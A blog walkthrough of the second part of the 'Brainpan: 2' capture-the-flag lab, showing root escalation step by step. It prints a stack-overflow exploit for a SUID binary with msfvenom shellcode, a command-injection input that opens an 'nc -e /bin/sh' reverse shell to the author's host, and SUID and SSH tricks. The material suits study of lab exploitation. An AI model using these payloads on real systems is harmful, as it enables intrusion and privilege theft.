środa, 11 czerwca 2014

PENTEST LAB - BRAINPAN: 2 (part II: looking for root)

This is part II of the "Pentest Lab" in which I'm presenting my fight with "Brainpan:2". In the first part I've gained access to the machine. Now it's time to gain root. I've logged as user "anansi" using reverse shell spawned from custom app running on port 9999. Let's have a look inside home folder







!!!SPOILER ALERT!!!
 If you want to finish this challenge alone stop reading here.






>_ term
anansi@brainpan2:/opt$ cd /home
cd /home
anansi@brainpan2:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root    root    4096 Nov  4  2013 .
drwxr-xr-x 22 root    root    4096 Nov  5  2013 ..
drwx------  2 anansi  anansi  4096 Jun  6 07:03 anansi
drwx------  4 puck    puck    4096 Nov  5  2013 puck
drwxr-xr-x  3 reynard reynard 4096 Nov  7  2013 reynard
anansi@brainpan2:/home$ cd anansi
cd anansi
anansi@brainpan2:~$ ls -la
ls -la
total 28
drwx------ 2 anansi anansi 4096 Jun  6 07:03 .
drwxr-xr-x 5 root   root   4096 Nov  4  2013 ..
-rw------- 1 anansi anansi    0 Nov  5  2013 .bash_history
-rw-r--r-- 1 anansi anansi  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 anansi anansi 3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 anansi anansi  675 Nov  4  2013 .profile
-rw-r--r-- 1 anansi anansi   22 Jun  6 07:03 somefilename
-rwxr-xr-x 1 anansi anansi  114 Nov  4  2013 startbrainpan.sh
anansi@brainpan2:~$ cd ..
cd ..
anansi@brainpan2:/home$ ls
ls
anansi  puck  reynard
anansi@brainpan2:/home$ cd reynard
cd reynard
anansi@brainpan2:/home/reynard$ ls -la
ls -la
total 44
drwxr-xr-x 3 reynard reynard 4096 Nov  7  2013 .
drwxr-xr-x 5 root    root    4096 Nov  4  2013 ..
-rw------- 1 reynard reynard    0 Nov  7  2013 .bash_history
-rw-r--r-- 1 reynard reynard  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 reynard reynard 3392 Nov  4  2013 .bashrc
-rwsr-xr-x 1 root    root    8999 Nov  6  2013 msg_root
-rw-r--r-- 1 reynard reynard  675 Nov  4  2013 .profile
-rw-r--r-- 1 reynard reynard  154 Nov  5  2013 readme.txt
-rwxr-xr-x 1 reynard reynard  137 Nov  4  2013 startweb.sh
drwxr-xr-x 3 reynard reynard 4096 Nov  4  2013 web
anansi@brainpan2:/home/reynard$ ./msg_root
./msg_root
usage: msg_root username message
Nothing interesting in anansi folder, but I could access reynard home folder and found there an interesting app. I've started SimpleHTTPServer inside his folder and downloaded a binary.
>_ term
anansi@brainpan2:/home/reynard$ python -m SimpleHTTPServer 12000
python -m SimpleHTTPServer 12000
Serving HTTP on 0.0.0.0 port 12000 ...
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET / HTTP/1.1" 200 -
192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 -
192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 -
192.168.57.1 - - [06/Jun/2014 07:33:11] "GET /msg_root HTTP/1.1" 200 -
At this point I knew that there's probably a some way to exploit that binary. Why? That's why:
>_ term
anansi@brainpan2:/home/reynard$ ./msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa                   
Segmentation fault
anansi@brainpan2:/home/reynard$
Let's make some reverse engineering.
>_ term
$ gdb msg_root
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/..../msg_root...done.
(gdb) r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Starting program: /home/..../brainpan2/msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x0804872e in get_name (u=0xffffd5c3 'a' <repeats 108 times>, m=0xffffd630 'a' <repeats 87 times>) at msg_root.c:26
#2  0x0804877b in main (argc=3, argv=0xffffd434) at msg_root.c:35
I've checked file in hte and found some functions inside:
- save_msg
- get_name
- main
When app is executed it goes: main -> get_name -> save_msg. Looking on backtrace from crash I noticed address 0x0804872e which is inside method get_name. Disassembling this function gives code like below:
>_ term
Dump of assembler code for function get_name:
   0x080486a1 <+0>:    push   %ebp
   0x080486a2 <+1>:    mov    %esp,%ebp
   0x080486a4 <+3>:    sub    $0x20,%esp
   0x080486a7 <+6>:    movl   $0x804863c,-0x4(%ebp)
   0x080486ae <+13>:    mov    0x8(%ebp),%eax
   0x080486b1 <+16>:    mov    %eax,(%esp)
   0x080486b4 <+19>:    call   0x8048500 <strlen@plt>
   0x080486b9 <+24>:    cmp    $0x11,%eax
   0x080486bc <+27>:    ja     0x80486d2 <get_name+49>
   0x080486be <+29>:    mov    0x8(%ebp),%eax
   0x080486c1 <+32>:    mov    %eax,0x4(%esp)
   0x080486c5 <+36>:    lea    -0x12(%ebp),%eax
   0x080486c8 <+39>:    mov    %eax,(%esp)
   0x080486cb <+42>:    call   0x80484b0 <strcpy@plt>
   0x080486d0 <+47>:    jmp    0x80486ec <get_name+75>
   0x080486d2 <+49>:    movl   $0x12,0x8(%esp)
   0x080486da <+57>:    mov    0x8(%ebp),%eax
   0x080486dd <+60>:    mov    %eax,0x4(%esp)
   0x080486e1 <+64>:    lea    -0x12(%ebp),%eax
   0x080486e4 <+67>:    mov    %eax,(%esp)
   0x080486e7 <+70>:    call   0x8048540 <strncpy@plt>
   0x080486ec <+75>:    movl   $0x7d0,(%esp)
   0x080486f3 <+82>:    call   0x80484c0 <malloc@plt>
   0x080486f8 <+87>:    mov    %eax,-0x8(%ebp)
   0x080486fb <+90>:    mov    0xc(%ebp),%eax
   0x080486fe <+93>:    mov    %eax,(%esp)
   0x08048701 <+96>:    call   0x8048500 <strlen@plt>
   0x08048706 <+101>:    mov    %eax,0x8(%esp)
   0x0804870a <+105>:    mov    0xc(%ebp),%eax
   0x0804870d <+108>:    mov    %eax,0x4(%esp)
   0x08048711 <+112>:    mov    -0x8(%ebp),%eax
   0x08048714 <+115>:    mov    %eax,(%esp)
   0x08048717 <+118>:    call   0x8048540 <strncpy@plt>
   0x0804871c <+123>:    mov    -0x8(%ebp),%eax
   0x0804871f <+126>:    mov    %eax,0x4(%esp)
   0x08048723 <+130>:    lea    -0x12(%ebp),%eax
   0x08048726 <+133>:    mov    %eax,(%esp)
=> 0x08048729 <+136>:    mov    -0x4(%ebp),%eax
   0x0804872c <+139>:    call   *%eax
   0x0804872e <+141>:    mov    -0x8(%ebp),%eax
   0x08048731 <+144>:    mov    %eax,(%esp)
   0x08048734 <+147>:    call   0x8048490 <free@plt>
   0x08048739 <+152>:    leave
   0x0804873a <+153>:    ret  
End of assembler dump.
The arrow points instruction that moves content of the address 4bytes before ebp and moves it to eax and then jumps to it. Here's how this looks when user provides valid input:
>_ term
 Breakpoint 2, 0x08048729 in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3f8    0xffffd3f8
eax            0xffffd3e6    -11290
(gdb) x $ebp-4
0xffffd3f4:    0x0804863c
(gdb) x/12xw $esp
0xffffd3d8:    0xffffd3e6    0x0804a008    0x00000012    0x6161d4b4
0xffffd3e8:    0x61616161    0xffff0061    0x0804a008    0x0804863c
0xffffd3f8:    0xffffd408    0x0804877b    0xffffd644    0xffffd64c
You can notice few 61 which corresponds to  "aaaaaaa". Command x $ebp-4 shows what will be moved to eax, address 0x0804863c is where save_msg method starts. Checking address 0x0804a008 which is ebp-8 shows that this is a memory where second argument is copied (in my case it's a few b's which are 0x62 below):
>_ term
(gdb) x/8xw 0x0804a008
0x804a008:    0x62626262    0x62626262    0x62626262    0x62626262
0x804a018:    0x00006262    0x00000000    0x00000000    0x00000000
Moving further:
(gdb) s

Breakpoint 3, 0x0804872c in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3f8    0xffffd3f8
eax            0x804863c    134514236
you can see eax is now pointing to save_msg. Providing long first argument one can overwrite memory which will be copied to eax and thus crash the app, as shown below:
>_ term
Breakpoint 2, 0x08048729 in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) x/16xw $esp
0xffffd3a8:    0xffffd3b6    0x0804a008    0x00000012    0x6161d484
0xffffd3b8:    0x61616161    0x61616161    0x0804a008    0x61616161
0xffffd3c8:    0xffffd3d8    0x0804877b    0xffffd60c    0xffffd64c
0xffffd3d8:    0xffffd458    0xf7e6ee46    0x00000003    0xffffd484
(gdb) i r ebp eax
ebp            0xffffd3c8    0xffffd3c8
eax            0xffffd3b6    -11338
(gdb) s

Breakpoint 3, 0x0804872c in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3c8    0xffffd3c8
eax            0x61616161    1633771873
(gdb) s

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
Armored with that knowledge I started exploitation phase. My idea was simple. Provide address to the shellcode in first argument while writing the shellcode in the second one. So the first argument can only be the 0x0804a008 repeated few times which gives me:

For the second argument I've needed shellcode. You can find one online or use msfvenom:
>_ term
$ msfvenom -p linux/x86/exec CMD="/bin/sh" -b "x00" -f py
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 70 (iteration=0)
buf =  ""
buf += "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2"
buf += "\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01"
buf += "\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70"
buf += "\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d"
buf += "\x3d\xd4\x0e\x4c\x41"
Here's the second argument:
And command in action:
>_ term
anansi@brainpan2:/home/reynard$ ./msg_root `perl -e 'print "\x04\x08\x08\xa0"x8;'` `perl -e 'print "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`
<x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`    
$ id
id
uid=1000(anansi) gid=1000(anansi) euid=104(root) groups=106(root),50(staff),1000(anansi)
$ cd /root
cd /root
$ ls -la
ls -la
total 28
drwx------  3 root  root  4096 Nov  5  2013 .
drwxr-xr-x 22 root  root  4096 Nov  5  2013 ..
drwx------  2 root  root  4096 Nov  4  2013 .aptitude
-rw-------  1 root  root     0 Nov  5  2013 .bash_history
-rw-r--r--  1 root  root   589 Nov  5  2013 .bashrc
-rw-r--r--  1 root  root   159 Nov  5  2013 .profile
-rw-------  1 root  root   461 Nov  5  2013 flag.txt
-rw-------  1 root  root   245 Nov  5  2013 whatif.txt
$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
$ cat whatif.txt
cat whatif.txt

       WHAT IF I TOLD YOU
              ___
            /     \
           | ______\
          (, \_/ \_/
           |   ._. |
           \   --- /
           /`-.__.'
      .---'`-.___|\___
     /                `.

       YOU ARE NOT ROOT?
$ ls -n
ls -n
total 8
-rw------- 1   0   0 461 Nov  5  2013 flag.txt
-rw------- 1 104 106 245 Nov  5  2013 whatif.txt
I must say, the trick with the root account is a nice one. There are two accounts one named "root" and the other one "root " (with a space on the end). The second one is the real root here. There's still a long road before me...I looked for SUID/SGID execs:
>_ term
$ find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
...
/opt/old/brainpan-1.8/brainpan-1.8.exe
...
This one in opt folder caught my attention. I found some files in that folder:
$ ls -la
ls -la
total 36
drwxrwxr-x 2 root  staff  4096 Nov  5  2013 .
drwx------ 3 root  root   4096 Nov  4  2013 ..
-rwsr-xr-x 1 puck  puck  17734 Nov  4  2013 brainpan-1.8.exe
-rw-r--r-- 1 puck  puck   1227 Nov  5  2013 brainpan.7
-rw-rw-rw- 1 puck  staff    27 Nov  5  2013 brainpan.cfg
$ cat brainpan.cfg
cat brainpan.cfg
port=9333
ipaddr=127.0.0.1
Let's modify the cfg to run app on all addresses:
$ echo "port=9333" > brainpan.cfg
echo "port=9333" > brainpan.cfg
$ echo "ipaddr=0.0.0.0" >> brainpan.cfg
echo "ipaddr=0.0.0.0" >> brainpan.cfg
$ cat brainpan.cfg
cat brainpan.cfg
port=9333
ipaddr=0.0.0.0
I've started the app and connected from my machine:
>_ term
$ nc 192.168.57.10 9444
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[______________________ WELCOME TO BRAINPAN 1.8________________________]
                             LOGIN AS GUEST                            

                          >> GUEST
                          ACCESS GRANTED


                             *  *  *  *                               
    THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED. 
    TYPE "TELL ME MORE" FOR A LIST OF COMMANDS. 
                             *  *  *  *                               

                          >> VIEW
    ENTER FILE TO DOWNLOAD: a; nc -e /bin/sh 192.168.57.1 5600
>_ term
$ nc -l -p 5600 -v
nc: listening on :: 5600 ...
nc: listening on 0.0.0.0 5600 ...
nc: connect to 192.168.57.1 5600 from 192.168.57.10 (192.168.57.10) 41003 [41003]
id
uid=1000(anansi) gid=1000(anansi) euid=1001(puck) groups=1001(puck),50(staff),1000(anansi)
We are almost the user "puck". There are few ways to elevate our id from 1000 to 1001. I've show one in this post and here's it in action:
>_ term
python -c 'import os,pty;os.setresuid(1001,1001,1001);pty.spawn("/bin/bash");'
puck@brainpan2:/opt/old/brainpan-1.8$ whoami
whoami
puck
puck@brainpan2:/opt/old/brainpan-1.8$ id
id
uid=1001(puck) gid=1000(anansi) groups=1001(puck),50(staff),1000(anansi)
puck@brainpan2:/opt/old/brainpan-1.8$
Let's check puck's folder:
>_ term
puck@brainpan2:/opt/old/brainpan-1.8$ cd /home
cd /home
puck@brainpan2:/home$ cd puck
cd puck
puck@brainpan2:/home/puck$ ls -la
ls -la
total 28
drwx------ 4 puck  puck  4096 Nov  5  2013 .
drwxr-xr-x 5 root  root  4096 Nov  4  2013 ..
drwxr-xr-x 3 puck  puck  4096 Nov  5  2013 .backup
-rw------- 1 puck  puck     0 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck  puck   220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck  puck  3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck  puck   675 Nov  4  2013 .profile
drwx------ 2 puck  puck  4096 Nov  5  2013 .ssh
Looks clean, backup folder looks suspicious. I've checked it:
>_ term
puck@brainpan2:/home/puck$ cd .backup
cd .backup
puck@brainpan2:/home/puck/.backup$ ls -la
ls -la
total 28
drwxr-xr-x 3 puck puck 4096 Nov  5  2013 .
drwx------ 4 puck puck 4096 Nov  5  2013 ..
-rw------- 1 puck puck  395 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck puck  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck puck 3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck puck  675 Nov  4  2013 .profile
drwx------ 2 puck puck 4096 Nov  4  2013 .ssh
Not empty bash_history? That's strange:
>_ term
puck@brainpan2:/home/puck/.backup$ cat .bash_history
cat .bash_history
cd /usr/local/bin
ls -l
./msg_root "comment on the latest version please"
cd /opt/brainpan/
ps aux
vi brainpan-1.8.c
cd ../archive
netstat -antp
netstat -antp | grep 9888
cd ..
ls
cd old
ls
cd brainpan-1.8
vi brainpan-1.8.c
ssh -l "root " brainpan2
vi brainpan.7
man ./brainpan.7
ls
htop
top
ls -latr
cat .bash_history
ls
mkdir .backup
mv .ssh .bash* .backup
cd .backup/
ls
clear
ls -latr
exit
puck@brainpan2:/home/puck/.backup$
So user puck can login on the root through ssh. Dunno why but I've done this:
>_ term
puck@brainpan2:/home/puck$ mv .ssh .ssh-old
mv .ssh .ssh-old
puck@brainpan2:/home/puck$ cp -rp .backup/.ssh .
cp -rp .backup/.ssh .
puck@brainpan2:/home/puck$ ls -la
ls -la
total 32
drwx------ 5 puck  puck   4096 Jun  6 10:31 .
drwxr-xr-x 5 root  root   4096 Nov  4  2013 ..
drwxr-xr-x 3 puck  puck   4096 Nov  5  2013 .backup
-rw------- 1 puck  puck      0 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck  puck    220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck  puck   3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck  puck    675 Nov  4  2013 .profile
drwx------ 2 puck  anansi 4096 Nov  4  2013 .ssh
drwx------ 2 puck  puck   4096 Nov  5  2013 .ssh-old
puck@brainpan2:/home/puck$ ssh -l "root " brainpan2
ssh -l "root " brainpan2
ssh: connect to host brainpan2 port 22: Connection refused
Either ssh is not running or it's running on different port.
>_ term
puck@brainpan2:/home/puck$ cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 2222
...
Got ya!
>_ term
puck@brainpan2:/home/puck$ ssh -l "root " brainpan2 -p 2222
ssh -l "root " brainpan2 -p 2222
The authenticity of host '[brainpan2]:2222 ([127.0.1.1]:2222)' can't be established.
ECDSA key fingerprint is 0a:15:1c:1c:25:b0:fe:54:8a:35:45:e5:b8:02:97:1a.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '[brainpan2]:2222' (ECDSA) to the list of known hosts.
Linux brainpan2 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov  7 11:00:06 2013
root @brainpan2:~# cat /root/flag.txt
cat /root/flag.txt

                          !!! CONGRATULATIONS !!!

                 You've completed the Brainpan 2 challenge!
                 Or have you...?

                 Yes, you have! Pat yourself on the back. :-)

                 Questions, comments, suggestions for new VM
                 challenges? Let me know!


                 Twitter: <redacted>
                 Email  : <redacted>
                 Web    : http://www.techorganic.com

root @brainpan2:~#
That's all! I must say I've really enjoyed this one. There were a few times when I wanted to grab my laptop and learn it fly but beating these moments gave me a lot of satisfaction and new experiences. See you soon!

Brak komentarzy:

Prześlij komentarz